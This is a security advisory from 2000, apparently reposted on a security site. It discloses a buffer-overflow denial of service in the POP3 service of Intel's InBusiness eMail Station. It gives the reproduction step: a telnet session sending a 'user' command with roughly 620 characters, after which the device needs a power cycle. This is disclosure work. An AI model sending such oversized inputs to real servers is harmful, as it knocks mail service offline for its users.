[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Intel corporation 'InBusiness eMail Station'

Title: Intel corporation 'InBusiness eMail Station'
Released by: Knud Erik Højgaard
Date: 20th October 2000
Printable version: Click here
Intel corporation 'InBusiness eMail Station' firmware version 1.04.87

(latest) Denial of service vulnerability.

Vendor notification date: 20/10-2000

Public notification date: 20/10-2000

Problem: I found a buffer overflow in the Intel InBusiness eMail Station,


can enable an attacker to execute a denial of service attack against it.

Disclaimer: For educational purposes only.

example :

[foo@bar]$ telnet mailstation 110

Trying mailstation...

Connected to mailstation.

Escape character is '^]'.

+OK Pop server at mailstation starting. <2831812.972049732@mail>

user [buffer]

where [buffer] is appx. 620 chars of your own choice.(tried A and %, expect

all to work)

Symptoms: The box(a nice little piece of hardware with built-in harddrive

and all) will stop responding, and needs a power cycle to restore function.

Reason for posting same date as vendor notification:  Intel was contacted

and informed of the bug, and all they had to say was "You're using it in a

way its not supposed to be used" (i told them it was on a leased line) - in

their opinion it doesn't matter since its possible to connect a modem to it,

and use it for retrieving mail and distributing it locally.

Sincerely (and a big thanks to Intel for not caring about product security

at all)

Knud Erik Højgaard 

(C) 1999-2000 All rights reserved.